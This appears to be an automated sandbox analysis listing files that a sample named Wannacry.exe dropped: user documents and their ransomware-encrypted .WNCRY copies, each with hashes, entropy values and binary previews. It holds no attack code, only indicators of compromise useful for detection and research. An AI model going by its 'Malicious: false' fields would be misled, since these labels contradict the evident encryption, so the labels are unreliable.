Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.819291361679207
Encrypted:	false
SSDEEP:	24:CmD6Hds+5AdDykd3vMBQ6aJTTGM5yfmXErqvfDGVaT0qXShlrEGbo:vDD1/oaJTTGMFiOfDGVEKDrg
MD5:	797710A6419335C389DED0AE6A569B28
SHA1:	1106D32D7E4BDAC30FCFE1CB3432059EBEB00E58
SHA-256:	10D87C6571A9EEBB731557C8EA68210FB12A0C5F057259C09D5758E56E40ED73
SHA-512:	C01AF3EB8D0A0E0DA40BBF40A7D9FEABF1B45B5E103E4875A649B17185EAFE68D021C3ED68E8F9B85FEAD4CCE462DE4CA826EFFE4428B3387CB18994689F4B12
Malicious:	false
Reputation:	unknown
Preview:	...J.....P..c/....c.@.U..N......_.t7.A.......A.;G3.a.1..5.......;....P=.H...0..).+%.f..P{..KaZ%.J,f.3..qa7...dX...)..b.w.8.].&.(...v9..V^F....n.[U.oOW..!E$wY]<GoA...qSa..q...BN..i._.i(w...w.[Z8r.R..},......U@....e"...:.!....75N4..}........U..US6........>],,..B.8...$.t....~UG. ..R.F5.#.T...f.K_?..{k...X,.f.]b...p&....{......p8.a....g...$c0.....>.;N.<.[Hw....#.$20...+s..z..#..+.>.Ne.!.<.Fn..ZG5.D!...qwG^.uw....%].=k.VTV..&.8..{z...'.....z.7.(./.N.5q.......uBVv.3O..%.%wA$]8...4..e...'.._...,n.{._A.a#NUr.\[.:7.Y..-...q.M...~e..k.5.0J.._./ K..M...YX...t.3S.v...DX...a..Hi..S>..39.6Zvj....Y.)..z.sQ.........Pg.gx....hR..sN.y..Y..)........w..%MgQ...C....&.O.X.........>=..\|M.jh.\....BW1.......w..!.......+4>..(.H.....9a.}...6.e$((....x...i9.....[f..B..&UQz.........k..Q..I....1...:a..G...O..x..6.4...W.R.B...f.W[ .io.+D.Z. .......V.....+.>....d7y..6.S.q..&.........\%.".N.Em.G$..../.:.pdah.n'.p.a.b.}.~.k.].5Y._b..G:3X#8."...:.....7zMd..##`F.$'...8..l..

C:\Users\user\Documents\EWZCVGNOWT\EWZCVGNOWT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.843848505517489
Encrypted:	false
SSDEEP:	24:bktRvTnyJLc5QFABhu8kzcFwdUkA0+dOqqRhKPYH1ZGqmrtxpLSpGYuIaxwEOKQW:bkfvTnElAXNzwpA5OqqRhKgVZqPpWpGz
MD5:	EC865EB7F9BE5BE6F3AFD021E2A7E4A4
SHA1:	077E7E6D44F9796D5CA0640E809E96EC3B7C6C8D
SHA-256:	27CC1AB9E3804B6F324645CD280A82650F3FF7A2863774A5699F0E1AFA5916DF
SHA-512:	38EFA9FC7D4B0BC440B2F3FF3D985B79C74FE330C870355C9F8B0591CED5574DE9724999F82B04722200DBE7A5C5382C08CF96931223D327A59957928DA38427
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....e......w...b....M..:u._.m/.._..F...N.....J.....U#.P....}.#y..3..`....B9....t....N.{..0..!.q.v..df..(......%.E.p.]..~..Q...^....5{.&..f.!.C.......3.^.....5....).....&..qy..x.xx..ct0.cB)#Z.V..E...B2...:....*..3u...CR........T.ax..........P..............ud....s(..B&FH..>.8v.........5.g...j,/s].l.3(7....FQ.t....w..+.oi:...h..p..E.H&.B...P.2M...&.C.J2bF.f...&.U......D..w...@.B.n.....t....m\|.?..W....H...u#...S.+^A!.k3...@aT.z....%9...A..R...I....sr5....d.\.?.v...x..p.v...8.[.3.)]..q...'+..#.....m.......k....."hk..j.../.{lS.2....\|/d..2.0......;..4.....#.k.....L...i....-..c/h`{..M......_'6..31..<,.y.,...y9.!....I.d....n\..AM......A...j?...5...Nn............bq.H.xz[.a.mo~/(.......8..h.....X.).....9.n..5.>Q...G....X.K.Q....a.../...".=1.......qq...k.,..A..a.N~."...`6.N..C..;.....M?%.pf...B.............)..5...._...M.r?.-..!t....j..y.!.9z.d..[~.c..p._b...../....4.5.....=..\|.I.J..VC.{..T.-8lE._.z,~.._.:=.6.{mc....tIE..O..

C:\Users\user\Documents\EWZCVGNOWT\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.843848505517489
Encrypted:	false
SSDEEP:	24:bktRvTnyJLc5QFABhu8kzcFwdUkA0+dOqqRhKPYH1ZGqmrtxpLSpGYuIaxwEOKQW:bkfvTnElAXNzwpA5OqqRhKgVZqPpWpGz
MD5:	EC865EB7F9BE5BE6F3AFD021E2A7E4A4
SHA1:	077E7E6D44F9796D5CA0640E809E96EC3B7C6C8D
SHA-256:	27CC1AB9E3804B6F324645CD280A82650F3FF7A2863774A5699F0E1AFA5916DF
SHA-512:	38EFA9FC7D4B0BC440B2F3FF3D985B79C74FE330C870355C9F8B0591CED5574DE9724999F82B04722200DBE7A5C5382C08CF96931223D327A59957928DA38427
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....e......w...b....M..:u._.m/.._..F...N.....J.....U#.P....}.#y..3..`....B9....t....N.{..0..!.q.v..df..(......%.E.p.]..~..Q...^....5{.&..f.!.C.......3.^.....5....).....&..qy..x.xx..ct0.cB)#Z.V..E...B2...:....*..3u...CR........T.ax..........P..............ud....s(..B&FH..>.8v.........5.g...j,/s].l.3(7....FQ.t....w..+.oi:...h..p..E.H&.B...P.2M...&.C.J2bF.f...&.U......D..w...@.B.n.....t....m\|.?..W....H...u#...S.+^A!.k3...@aT.z....%9...A..R...I....sr5....d.\.?.v...x..p.v...8.[.3.)]..q...'+..#.....m.......k....."hk..j.../.{lS.2....\|/d..2.0......;..4.....#.k.....L...i....-..c/h`{..M......_'6..31..<,.y.,...y9.!....I.d....n\..AM......A...j?...5...Nn............bq.H.xz[.a.mo~/(.......8..h.....X.).....9.n..5.>Q...G....X.K.Q....a.../...".=1.......qq...k.,..A..a.N~."...`6.N..C..;.....M?%.pf...B.............)..5...._...M.r?.-..!t....j..y.!.9z.d..[~.c..p._b...../....4.5.....=..\|.I.J..VC.{..T.-8lE._.z,~.._.:=.6.{mc....tIE..O..

C:\Users\user\Documents\EWZCVGNOWT\GIGIYTFFYT.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802117767651323
Encrypted:	false
SSDEEP:	24:LIg0+9vjLfwF4oEBkOZS83yVqIoC0N6MD0Svh2siGpkjyKXLos1:LIg0ojE81Vy4Itz22siiW51
MD5:	5D2E37399753AF3E4CF6C64A47ACF5D2
SHA1:	DE9D1362B9BDFF00EB2DD66A8B276575A1C2114D
SHA-256:	66B7BF5A00F6A6DB6BBA6218CF5F9698C32AF0545636BBE3519E6A8D927B00C8
SHA-512:	E4BE6255E44F75833EA94104D3C9D80875DC16CDB756550C1DA7C4CF139A7CFCFFA2EFA456C0899E5404E8798D069937CA880FAEE0A738A2DA11DF708C6EE9EF
Malicious:	false
Reputation:	unknown
Preview:	...WY..M._..%@M..o.2...)..:...g..M.sl@.3.0...."...o7.S.4p.`..J1L..d@H.f..W.e..w...w..M.~~.?.D..........D........,sQ.HB.Bd...z....xU...n.>?..7......./\|-..)0.0J..'....A2....@I.<uS ...N.=.ml.[.i.....O.!...QCll....X...\|...&"%....K"o\..s............MUb..{o70/.F<...X..m.XPO....1@...~...<...Wa)...Ka^[#I.}}...T.!.u..$..ToT.....#.X.~.$.(....)..........0....&.b.{.A......$%.Y.Y..>6.`Q.3p.B.-.xM..;M}.qF%.(...,......V.5M.c-s#.U....^.:8...P.......v.)xq..l.....w...1.P..k..d...F.K....2...x..`>48..W.A<6..j.n..k5.e].....v.{....q.P..u.......&......o9...8O.V....,.w_8.GB>.....0...Y....6...7iC..k8.%.....)#...%.@....MYw.qF ....\.._..{...PQ;....^.X..j.%. ..l....`..'...eF.....UZj....ah...z=..E..u...4.$.Vd.?.r6c.8sp.b..JL....B'...5a.....#.J.....N..(W../......_3....cW?;.t#.....t0`...^..".=..V...8....q.nHB2...z...S.r...$.. .....M.kV..%..E,.?...r.....c"*3....C<.......\|mS.....x...G."S... .4P.b6.0.eY..4...T.lc../..+......]$.y.....n..L.....!g.....@.j...3..S..}.......A

C:\Users\user\Documents\EWZCVGNOWT\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.840872883937453
Encrypted:	false
SSDEEP:	24:bkS2guzQRVzPCgTbYa5PyWIrnHNQSFsERG6k7LtFNcOI2nK1SO7u7uOY0:bkS2gDVzPLTUa5JCpFsEUZcOSGlY0
MD5:	C41E6D0AF17DCEAF4948B67D1064C1C2
SHA1:	B208E0E0938A776AE87945D5308202898D23257F
SHA-256:	137B8BD51E88B408BB4F1C2407090D5D274C02A9CE53DC1378CFBF586A056501
SHA-512:	AB9598ACB91F99A75B0225A69F8481D0F58FFA36DD9E681C6383406253B5D89F7B109D9605DCA6E205DD21278F91784139CE534C6943ECAD8E9BC5362B15907B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......yg\.r;.....M4......X.F..L........K.%.% ff.`<...s......(s.9..(.c.5<.6...N}.&v.r@.5}.!....G...>z.IA...1--.....?..R..SEPk.+.a.d.dE....T}.J..F..m;..}.).......O.Ge.O.H.`.4..........(.A..L.7i..`... }.....i..0...%.8.D..s..q....@J....H.>..:WqP..............f.4:8..>.:R.d='....\|.b.?...1..6:..JO..3.l.;?)..D..q.....D..?,..W.....K..8Z....\|...0.d{.....Fwd..=.....i..13..6...X0.....%....rg5.UU.G8QbrC...{..$.....4-b..X....c+.$5rp.P..@.M.%.a2Y>M.._.....~-).\.f.T.i{.....N..R9L...,...Zn.7o..U=/e...#]+$8u...........fp.]....Z...aH(1.k?.....+........v.J_.......b.......5./V...c.1..~y..-C-....H..L.^..{F.l..6..W^..K...1..p..N...xz[......gb...0..G....eI{H...h.6.:g..t..>!.N@.S........ef....:..<.F..........FrX.5<.A~qJ.z..Ci.Kr...P..&...i...#+...r}..T..J.. ......5M.....u0..JM"....."y.qE.......`H..D..h..9.g.9~.-.&......6_dtK.....Q..mW.+....=...Z.!.X[.~.x.F.}..z.....X..&..,...>V...P....=..s/...ECL.7.....'R....I...7...x\|2Z.......[E..P7..

C:\Users\user\Documents\EWZCVGNOWT\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.840872883937453
Encrypted:	false
SSDEEP:	24:bkS2guzQRVzPCgTbYa5PyWIrnHNQSFsERG6k7LtFNcOI2nK1SO7u7uOY0:bkS2gDVzPLTUa5JCpFsEUZcOSGlY0
MD5:	C41E6D0AF17DCEAF4948B67D1064C1C2
SHA1:	B208E0E0938A776AE87945D5308202898D23257F
SHA-256:	137B8BD51E88B408BB4F1C2407090D5D274C02A9CE53DC1378CFBF586A056501
SHA-512:	AB9598ACB91F99A75B0225A69F8481D0F58FFA36DD9E681C6383406253B5D89F7B109D9605DCA6E205DD21278F91784139CE534C6943ECAD8E9BC5362B15907B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......yg\.r;.....M4......X.F..L........K.%.% ff.`<...s......(s.9..(.c.5<.6...N}.&v.r@.5}.!....G...>z.IA...1--.....?..R..SEPk.+.a.d.dE....T}.J..F..m;..}.).......O.Ge.O.H.`.4..........(.A..L.7i..`... }.....i..0...%.8.D..s..q....@J....H.>..:WqP..............f.4:8..>.:R.d='....\|.b.?...1..6:..JO..3.l.;?)..D..q.....D..?,..W.....K..8Z....\|...0.d{.....Fwd..=.....i..13..6...X0.....%....rg5.UU.G8QbrC...{..$.....4-b..X....c+.$5rp.P..@.M.%.a2Y>M.._.....~-).\.f.T.i{.....N..R9L...,...Zn.7o..U=/e...#]+$8u...........fp.]....Z...aH(1.k?.....+........v.J_.......b.......5./V...c.1..~y..-C-....H..L.^..{F.l..6..W^..K...1..p..N...xz[......gb...0..G....eI{H...h.6.:g..t..>!.N@.S........ef....:..<.F..........FrX.5<.A~qJ.z..Ci.Kr...P..&...i...#+...r}..T..J.. ......5M.....u0..JM"....."y.qE.......`H..D..h..9.g.9~.-.&......6_dtK.....Q..mW.+....=...Z.!.X[.~.x.F.}..z.....X..&..,...>V...P....=..s/...ECL.7.....'R....I...7...x\|2Z.......[E..P7..

C:\Users\user\Documents\EWZCVGNOWT\JDDHMPCDUJ.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.833192084028641
Encrypted:	false
SSDEEP:	24:9oz7pLFVYs/7civ2cjruHWbC8EUQex9grhqXY4Wxsoq2Hl:9O7BjOi6HYyU5x9grh1pxsKF
MD5:	49DFFC3B211F931C50BF635A9213C828
SHA1:	9A0ECDC1CF05DF66FF2B91E348393BCC9380D12E
SHA-256:	20B9DB40086587127333F5EE3A799D6A8263EB085F9DE168A6C16D88F7CE83F0
SHA-512:	0C98C24FEEAA602A3FEADB9E4735918649819C8A022A33392FBBC5C234716AFAF08167F95DDD19634293460FE0C3A800E84666315F6C03A346E99BBF5419222C
Malicious:	false
Reputation:	unknown
Preview:	....fG....g....FZ..kH.[!...X.K.U."a.m..XBN..D.WjX..c..a.glJ.4.._}CI...F...Y.$.%^q:...{......j..:..6......AF..7@...y...,........\|Z./6e.c.O.Qg....I.....Z.x..8a.rn.3...^do..k=..,..o.E.}.Q.......[..b.4.&..~A.cse.X.....GAR.L.6.0E.y...c0..:.K......J..N.!n3...a...!.1.;../...S....+...G..#7.....Y......_.L.d..c..b..t.LA........'n a..DL..I....G..qJ:...".,8.D^$>.&.QBWi.......16..j..(.y^...S..G.'.).3.k.A._. ..D...ts..`..<....=...w..8.p ?.......yH.KKGc.%.........p....M..`u2!....V.5\|..:4d"..7..LSqr...t..\eeMO..h0.+w.p......j...V...\|.$.M....{.".g...=..N>S.[.]/A3.C.!?....ZT]Vp.$..Bf\...m..#.?.i`.....@............A .....%.....d.......-.O%K....U..~w..'.b..}<.i\x.U..w..M.=..!1p.Q.W}s.....#..s.T.p....W.Z=.l...P..b.P..c.3..>$.....[...^.......{..E^.<C.8....~........./.-t.uc.......).y%.Ni.2.+\.Y..1.%.s...%.........3.f.qbS.h..._u.....bl.9o...R6.......>.P......:...W>&.0.......jD..K#..5IF.1z.p.Tn8....-.1.GM.C..,$G..?...1.7......s.*..:...X.3{.lP..k\H...nwI..... .

C:\Users\user\Documents\EWZCVGNOWT\JDDHMPCDUJ.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.858345056274101
Encrypted:	false
SSDEEP:	24:bkKLIQrSTgPCxOwHqwnDj3EPSfB7RazbpnNZ9TLw+IuB5Liwzc:bkIIQGJhH3OS51aPpnNZVVIu+gc
MD5:	7F8DCD917D76C3A50722F90E39BBEA40
SHA1:	6DA41FB69DCE5DBE2E492B11CB886BEED243B093
SHA-256:	BE37F2FF6520963A2C9370281BDB514D256AB35118D0D2CFD33D0703BBFE0566
SHA-512:	8E1ADA4C526776165F22E5EAC04E3FAF8A79EC2907E503004179A1B0EBDA2158E8E850428071EAA22A09E43ADA73B46A35D7C297FC556F6E5DCE92974CBEA5D9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....K.h?.b.5gk.L..OF.dP,./~5:b.@..yS.,-f...9Q..%W....cK8[.n.b..x..1....0c7...[...Ci.2.....p....`...mc-@@..M...~............_Ic.oPoD....I@.y...}@.P......\|E....2...J..^.V...g(...9.xe..+..s.J.r3].P".O.......V......O.....'..'Y.WI......JM...2\|....d...............\iaVW ..+...^..O....[......@&L........r4.x.H.\|.....Ej3t..H.G...Z&..A...S...IM....C..~!.y...;..CH1..8G'.J.....M.B.mL.....}.{V.Nf..AG......td.......D. %.+.J...4~.W!..m..8a.D.2-.a.hr.g2E.o...)....[..;.Hl...H.........-5..)0.k..{z.`r.....`..5f6...'.}.f\...,?9.b{Z@.8...V.W.....A../FP{LZ......^......H...E..F,%....C.}"X.~.^'..Y..%.50g.{..Px....M$....>.....Z.$..d.J.;......Ehf..4...t.l..G.f.~1....!/..Q.TgXY..]...].Od.@.Y..N...-V.8..&.".N.d%w..F.[n..}p...?..(}.&.3.6.....tj.K....m....E.d.E.R...d..i.~,Q/.L..S.!.g..50].!S2."..#........R.,..<.W.9Gh...FR ........3..o.>."..\p.......N.k7....:..zg.a..e.lw...d.,'..u.'...]>.sv...^...).F..T"..Nk...(H..v..P........N.PDn.S/N.p.. .m{l.....K.I...G..> .6.

C:\Users\user\Documents\EWZCVGNOWT\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.858345056274101
Encrypted:	false
SSDEEP:	24:bkKLIQrSTgPCxOwHqwnDj3EPSfB7RazbpnNZ9TLw+IuB5Liwzc:bkIIQGJhH3OS51aPpnNZVVIu+gc
MD5:	7F8DCD917D76C3A50722F90E39BBEA40
SHA1:	6DA41FB69DCE5DBE2E492B11CB886BEED243B093
SHA-256:	BE37F2FF6520963A2C9370281BDB514D256AB35118D0D2CFD33D0703BBFE0566
SHA-512:	8E1ADA4C526776165F22E5EAC04E3FAF8A79EC2907E503004179A1B0EBDA2158E8E850428071EAA22A09E43ADA73B46A35D7C297FC556F6E5DCE92974CBEA5D9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....K.h?.b.5gk.L..OF.dP,./~5:b.@..yS.,-f...9Q..%W....cK8[.n.b..x..1....0c7...[...Ci.2.....p....`...mc-@@..M...~............_Ic.oPoD....I@.y...}@.P......\|E....2...J..^.V...g(...9.xe..+..s.J.r3].P".O.......V......O.....'..'Y.WI......JM...2\|....d...............\iaVW ..+...^..O....[......@&L........r4.x.H.\|.....Ej3t..H.G...Z&..A...S...IM....C..~!.y...;..CH1..8G'.J.....M.B.mL.....}.{V.Nf..AG......td.......D. %.+.J...4~.W!..m..8a.D.2-.a.hr.g2E.o...)....[..;.Hl...H.........-5..)0.k..{z.`r.....`..5f6...'.}.f\...,?9.b{Z@.8...V.W.....A../FP{LZ......^......H...E..F,%....C.}"X.~.^'..Y..%.50g.{..Px....M$....>.....Z.$..d.J.;......Ehf..4...t.l..G.f.~1....!/..Q.TgXY..]...].Od.@.Y..N...-V.8..&.".N.d%w..F.[n..}p...?..(}.&.3.6.....tj.K....m....E.d.E.R...d..i.~,Q/.L..S.!.g..50].!S2."..#........R.,..<.W.9Gh...FR ........3..o.>."..\p.......N.k7....:..zg.a..e.lw...d.,'..u.'...]>.sv...^...).F..T"..Nk...(H..v..P........N.PDn.S/N.p.. .m{l.....K.I...G..> .6.

C:\Users\user\Documents\EWZCVGNOWT\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801825763352753
Encrypted:	false
SSDEEP:	24:2bjOuaogdZOVvv2+hAnGNjj/8lBEjn95GdqDZR32Q5:4jOOhvhA0/8Cn9AKZF2Q5
MD5:	CA5A92D8F512D0BF4D8C4B20A61C11C0
SHA1:	473D45A4BF9EF0EAE2CE47833EC9ADF701998B6E
SHA-256:	C8432CA839CE2016112A982C2E1F3C18489AD49FBF044F384BDEA2B7166EFC08
SHA-512:	35E8E3C50CD666BBAE6ADEAD2B1CE0846DDF6F6B571EACFA0C5DAB4E580C7A0FBD3EF9940A647C3854E9312799762F6EBCBE43D43DD67BF2C8C28F9BEC9AD213
Malicious:	false
Reputation:	unknown
Preview:	.....o.v...&K.:9.E}.(.w.......i4.z.y.a......J.DJ.r...l..@..A3."W.iQ..s\K0'3F.]u..:....E...!eqR..."KP..is9..g..n.D..I.a.......]. ...G.-. Ez...n.%.0..J(..#$.r.%.~6.n.c9j..).u...]...........jR..e.X....j..a....jO...R..y.X...`. .........a.?..J..,.i...a..t{.5!....-g.^...j.R.p.....mnt ......T%..2..Bv..".Ts&...A.......!.F...[c.?;[O......v.(.=.,w#V....\|..Q..B...0.&.b.OYt..9s....0...-......b.N.z...u.}.j....j..,.dYLG...q/...6X .P...E..%...&._..-.....X........k..c..BQ.K.....k.{.,.@}N.np...Q.5#.C....!..'.9C......,....&q.F.6..#n..-.y....Ob./.ju{.O..Qh..'^i:....mI..V}...'...'.2..G..>...6(\.....l...&...T...Q(.5...Ebo.........C...^.2.....<....L.A..L.gA{`L.....C.D.qa^/..]~.;-/...Ek..B.i3....yL..8.._.>4]/...LT.l.).Y)..W..PK.yA....{!epP,.-X.=. ..2...Il.6....K\+.T&%.T;v.........s.;/!.O.m".N.S...h.u..iS.9...!.n....c+.9.kj.D..f5S.a....f.......)x.b..a.Gb.4...bY..>.Hi.a..!.k,.^.dr..._.,S).Y...U...]J0.].x.&t....".....h..A..l..2.%@x.Mas.<'.)<.Lsn..q..5.!......]..

C:\Users\user\Documents\EWZCVGNOWT\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.825523548748343
Encrypted:	false
SSDEEP:	24:bk/3xWcmMdQA8VN5I+Tnn3eRfqQ6iRcWahyW7uTxjcMIT7kVVzJHfBr8uP4V8Fri:bkEwQAk+4nqYQ/xjcMvVzJH5qEkSBuj
MD5:	9709BEEA053E1F33B5DA01B5FB0F761B
SHA1:	DDBBA5FD056978DEE81B92936EED9FE3F4DACA96
SHA-256:	4DC41BE4AE4F4DD15801058D1D76A925AD2709BC3A67D396B1CA8DE41A5614EF
SHA-512:	F9A6DCB1501E59D90A42ECE124493A5F6BDBFB8B95604E7F1B9E3A083F013709F6066489EB6FF50F0EC6B30590A1F2FCF0CA8BA33048C2F5D226E08C446E23DA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....0........]./..W.@.R....{C.p...c.x...P..+.'Lq...E..\|.[...T...m...0..Sm....~r.RQ@..Z.... ..-.&.5..c.........P.#...a.....F......x...m..?H.&.;i*?..-.v..'..).[.)..(,......K.........D...!.....p-..c....`~.m....W......f..Z......5........p\...'..{c.3z..............z........O......@..+...U.3....B..j+....Z;.b4,.s.=..?.B.a5`z./.m.....b...o.K..b.\|M..}.%4/...=...^.b.yf.x......n' ....v=~9.}^....E@....<K.0%..5p..'.l6...N8b."<h#9.m.6.@/O.._@..d.....(W.0.Sl$..l..Sm...bj.$..n......i.6...k...P.[.S..<...._:.Q.4...^....<q....k.v.~....._P.B.....,...'l....,'..C..0.e...W.m.{...X.vqF.<%.GIZ..n.2...l}...{..,V.Q.._N...2"anu...\|...D.T......1.}...E6..^`.J. ...../.y.3.)v<...wOY...s.^..4......t.P..Q.a..0.OL..[..>.R....Pu........`.....]......h.V.L.....!.l...udf{.6.s.dY.Yuc...F;....j .......1<.....zY..c.3qC....T..@....pz7a.<;Pv...A.tA.....XX':..t)NN`"69...L....4Q`..............".}..5..V...'.....)X.Z...t......Y}P..!.@.1...7jc....HW............L....d2M.."..0.

C:\Users\user\Documents\EWZCVGNOWT\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.825523548748343
Encrypted:	false
SSDEEP:	24:bk/3xWcmMdQA8VN5I+Tnn3eRfqQ6iRcWahyW7uTxjcMIT7kVVzJHfBr8uP4V8Fri:bkEwQAk+4nqYQ/xjcMvVzJH5qEkSBuj
MD5:	9709BEEA053E1F33B5DA01B5FB0F761B
SHA1:	DDBBA5FD056978DEE81B92936EED9FE3F4DACA96
SHA-256:	4DC41BE4AE4F4DD15801058D1D76A925AD2709BC3A67D396B1CA8DE41A5614EF
SHA-512:	F9A6DCB1501E59D90A42ECE124493A5F6BDBFB8B95604E7F1B9E3A083F013709F6066489EB6FF50F0EC6B30590A1F2FCF0CA8BA33048C2F5D226E08C446E23DA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....0........]./..W.@.R....{C.p...c.x...P..+.'Lq...E..\|.[...T...m...0..Sm....~r.RQ@..Z.... ..-.&.5..c.........P.#...a.....F......x...m..?H.&.;i*?..-.v..'..).[.)..(,......K.........D...!.....p-..c....`~.m....W......f..Z......5........p\...'..{c.3z..............z........O......@..+...U.3....B..j+....Z;.b4,.s.=..?.B.a5`z./.m.....b...o.K..b.\|M..}.%4/...=...^.b.yf.x......n' ....v=~9.}^....E@....<K.0%..5p..'.l6...N8b."<h#9.m.6.@/O.._@..d.....(W.0.Sl$..l..Sm...bj.$..n......i.6...k...P.[.S..<...._:.Q.4...^....<q....k.v.~....._P.B.....,...'l....,'..C..0.e...W.m.{...X.vqF.<%.GIZ..n.2...l}...{..,V.Q.._N...2"anu...\|...D.T......1.}...E6..^`.J. ...../.y.3.)v<...wOY...s.^..4......t.P..Q.a..0.OL..[..>.R....Pu........`.....]......h.V.L.....!.l...udf{.6.s.dY.Yuc...F;....j .......1<.....zY..c.3qC....T..@....pz7a.<;Pv...A.tA.....XX':..t)NN`"69...L....4Q`..............".}..5..V...'.....)X.Z...t......Y}P..!.@.1...7jc....HW............L....d2M.."..0.

C:\Users\user\Documents\EWZCVGNOWT\QCOILOQIKC.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.8151014205025575
Encrypted:	false
SSDEEP:	24:sS57/9QhkXvSX0QVzf+vdFTWt7ai6baOfFHBCpJFKDPNV8Pk:sU7/TXvqlVzf+1FiaiIf9BCpSQs
MD5:	3BCBFF0E842208F43229A6FC0AC0EDCD
SHA1:	09C8E1D4AEC4751DDB0AAF1FCA633FEA6ABBB3AC
SHA-256:	EF2496E7A5EF843515B92DAFF3871F54898401A0BDAEED65A6DA11BA5B0CB26A
SHA-512:	B4E343A0F2292B9C58EB7D90FD3F119F07E1624306F0D3F3C3218705E61588E42382CA50BBE198AA133A4432FD27AB8FCF0EA0CE99DC31A90D583480011117D1
Malicious:	false
Reputation:	unknown
Preview:	M.g..!W..T\..%l.h........}.}R...a.....U...~(_.d.^3...........j$.(.N...S..&.....U#.!...l..._..]..@#h.,....r?.5.#..1.Ow..........).\....>t.1C.%....[.....=p: uL&mI..K.....YDX2oi..yX.D.aB.uj..s..'.....(LIL.&.D...!R.u...z^.@x.@{.`..].f.t.......e=...E.0..z.0.7....-...Bb\LV..I.........9)T..o.}#.s.E....T.t.....B.a.M...,.$5;].`...`...8...e;,...7...D..\|./........T...8.....E5..B..+....2.u....Cb].d.>.-..x?1O.H...!.}J....Z.q}.[..KJ1F%R..G....-.!..3.R.:$FL.....XYu...'.Lc._..a..L...bA...'G...{.&...Gw.>E.t.....!.U.4....\.....5.....o...............e&.x...h1..W...t>..C\|.+W..T.(..&....,.#Ub..e......?...n.....?X.5;.....QS.s...l~!.:.f.j6...{H.C..D..c.d....o........f.....5....\|#..\|>.c%-V.J...Wx....#.ls.....Y..o..F....2...0.vzry..j..C(>-S..f..#......S3L].M9.&..0....2k.J.V..H-...o.fP..g.d..OK...HWn.Q.2............V.Mf.m.o.8...3.....Db..`7.G.O8..J..`O..^IyhF.M...h.U.....Q".q8...2l.q.,..\|...ONJ...;..{...Sr}....n.:D.cu.ld.W.1....q...^.]..,.\0.3d,.c!..E.

C:\Users\user\Documents\EWZCVGNOWT\QCOILOQIKC.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839516366716224
Encrypted:	false
SSDEEP:	24:bkxKI7rzN4axky0SuOfL3ziUp8r+tlGyZza0Ir9NcHMfMYQYp5AVHK7mdcpCv6cN:bkrrzN46k7hOf7OUp8Y3aF9NyMfrxqVJ
MD5:	C12A21926408D9BA7F342D38E98C1899
SHA1:	2963D16C0D69FCBB47EEF7950E307D14983A7825
SHA-256:	A5E04F48A98F7F32D6BD85B1ACDCCD5D4C55599478B751A8E00C98643C23AB93
SHA-512:	452B33526E9A1DD71DB37C56C62E4B8B6AEA3CF14D15E2B02736B6D4B26D3861347A485244C472DC34C8D1528BE74D7C0D1FFE07495EFCEFDD368BDE217149DF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......e\b...#.>[..if.O.B..Z_..BnZ...I.S+{oX....0R.EY.mc.E.Q_...?...0..t.G.S.....Z./\|..d.C...t#......Q.T...w.l..%).l.......{Bu.\F.veKi...B.q.+s&.....{p...8...l.#..r.).......:.P....q...p..B.L......GLRRv.?.......G'......b.U..NE.Xm.N`.-..H.Q..(.....y.............jOX...G...1.S.\.)....]9. 